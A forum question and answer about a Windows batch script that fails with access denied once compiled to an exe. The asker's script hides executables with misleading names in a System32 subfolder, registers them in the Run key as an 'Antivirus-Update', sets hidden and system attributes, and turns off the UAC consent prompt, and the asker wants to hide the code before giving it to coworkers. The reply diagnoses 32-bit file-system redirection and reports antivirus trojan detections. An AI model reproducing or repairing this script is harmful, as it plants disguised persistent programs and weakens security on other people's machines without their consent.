Having troubles with batch files

2019-04-12 15:50发布

站内问答 / 后端开发
643 1 4

This issue is eating my brains of. I have a simple batch file which makes a directory in %SYSTEMROOT% only if it does not exist & copies certain files to that directory, adds the attribute +S +R +H to them, adds two programs to startup via registry and disables UAC as I need it frequently like 3x day. It works well as a batch file but I want to distribute it to my fellow company mates. We all are having a competition in this so I do not need them to see my code; I know if I am still at the level of batch scripting than my code is not worth copying but my mates are also not the brightest bulbs!

My issue is that when I convert it to exe using Quick Batch Convertor as the moment it becomes an exe it starts giving Access denied error only when It gets to copy the files in %SYSTEMROOT% even though I am running it as administrator and the disabling UAC command, which is C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f works, which, originally should require admin privileges. Its only the the copying of files that give access denied when converted into exe. They all just work fine if it is in a form of batch.I know that this might be off topic but I suspect foul play on the batch file and not the Quick Batch Converter because I have converted many files using this converter an they worked flawless.

The code for my batch is here

@echo off
echo %CD%
cd %~dp0
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update"     /t REG_SZ /d     "\"C:\Windows\System32\SystemSettingsUpdate\HL~Realtime~Defense.exe\"  " /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v     "Antivirus-Update " /t REG_SZ /d     "\"C:\Windows\System32\SystemSettingsUpdate\Configure.exe\"  " /f 
if not exist "%SYSTEMROOT%\system32\SystemSettingsUpdate" mkdir         %SYSTEMROOT%\system32\SystemSettingsUpdate
cd %~dp0
taskkill /f /im configure.exe
copy "%~dp0HL~Realtime~Defense.exe"     "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Whatsapp,Inc.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Configure.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Configure.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Whatsapp,Inc.exe
ATTRIB +H -R +S             %SYSTEMROOT%\system32\SystemSettingsUpdate\HL~Realtime~Defense.exe


C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v                     ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f  
exit

Any Suggestions?

1条回答
干净又极端
2楼-- · 2019-04-12 16:24

This answer does not resolve your problem; it's intended for explanation of strangely unusual behaviour of compiled script. Described issue is not solvable with this 32-bit Quick Batch File Compiler. For proof, create a batch script battoexeTest.bat containing 

@ECHO OFF
SETLOCAL EnableExtensions
set t|find /I "system"
for /F "delims=" %%G in ('
wmic process Where "caption='cmd.exe' and not CommandLine like '%%%%wmic%%%%'" get CommandLine^,ExecutablePath /value 
') do for /F "delims=" %%g in ("%%~G") do echo(%%~g
pause

Output (elevated; note that I have redirected user's %temp% and %tmp% variables):

TEMP=D:\tempUser\SYSTEM
TMP=D:\tempUser\SYSTEM
CommandLine="C:\Windows\System32\cmd.exe" /C "D:\bat\battoexeTest.bat" 
ExecutablePath=C:\Windows\System32\cmd.exe

If you run compiled version of above script batToExeTestY.exe elevated, output would change as follows:

TEMP=D:\tempUser\SYSTEM
TMP=D:\tempUser\SYSTEM
CommandLine=cmd.exe /c ""D:\tempUser\SYSTEM\8YQTO48H.bat" "D:\bat\batToExeTestY.exe" "
ExecutablePath=C:\Windows\SysWOW64\cmd.exe

You can see that

  • batToExeTestY.exe creates a copy of original batch script with some random name 8YQTO48H.bat in temporary directory of account SYSTEM, see CommandLine;
  • runs that batch file in 32bit command line, see ExecutablePath.
  • hence, 32-bitness proved.

Read File System Redirector chapter in MSDN article Running 32-bit Applications:

The %windir%\System32 directory is reserved for 64-bit applications. … In most cases, whenever a 32-bit application attempts to access %windir%\System32, the access is redirected to %windir%\SysWOW64

Example: run attrib under 64-bit command line prompt (C:\Windows\system32\cmd.exe) regardless of elevated or not:

==> attrib "%SYSTEMROOT%\sysWOW64\SystemSettingsUpdate\*.*"
A    R       C:\Windows\sysWOW64\SystemSettingsUpdate\WOW-cliParser.exe
A            C:\Windows\sysWOW64\SystemSettingsUpdate\WOW-HL~Realtime~Defense.txt

==> attrib "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"
A            C:\Windows\system32\SystemSettingsUpdate\cliParser.exe
A  SHR       C:\Windows\system32\SystemSettingsUpdate\HL~Real~Def.txt

If you run attrib or dir under 32-bit command line prompt, then WOW redirector

  • displays C:\Windows\system32\SystemSettingsUpdate file directory although
  • shows files located in %SYSTEMROOT%\sysWOW64\SystemSettingsUpdate one.

Take a look:

==> %windir%\SysWoW64\cmd.exe /C attrib "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"
A    R       C:\Windows\system32\SystemSettingsUpdate\WOW-cliParser.exe
A            C:\Windows\system32\SystemSettingsUpdate\WOW-HL~Realtime~Defense.txt

==> %windir%\SysWoW64\cmd.exe /C dir /A "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"|find ":"
 Directory of C:\Windows\system32\SystemSettingsUpdate
01.03.2016  12:25    <DIR>          .
01.03.2016  12:25    <DIR>          ..
01.03.2015  12:31             5 120 WOW-cliParser.exe
26.02.2016  08:54                84 WOW-HL~Realtime~Defense.txt

Moreover, trying to run your batch script (slightly adapted for testing purposes and then compiled) elevated but AVG Internet Security Ultimate complains in its Resident Shield:

"Trojan horse Pakes_c.BWYN, d:\bat\batToExeTest.exe";"Secured";"25. 2. 2016, 22:50:52";"File or Directory";"c:\Program Files (x86)\Abyssmedia\Quick Batch File Compiler\quickbfc.exe"

and on copy "%~dp0XYZ.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate" line and/or on attrib lines in its Identity Protection module:

"IDP.ALEXA.51, D:\tempUser\SYSTEM\8W88ULA2.bat";"Secured";"26. 2. 2016, 8:35:14";"File or Directory";""
"Unknown, D:\tempUser\SYSTEM\0G8KOWPT.bat";"Secured";"26. 2. 2016, 1:08:25";"File or Directory";""

Could be a false positive, but you definitely need to use some virus-free and 64-bit-compliant bat to exe converter…

查看更多
0人赞 添加讨论(0) 举报
登录 后发表回答
相关问题
查看全部
相关文章
查看全部
收藏的人(4)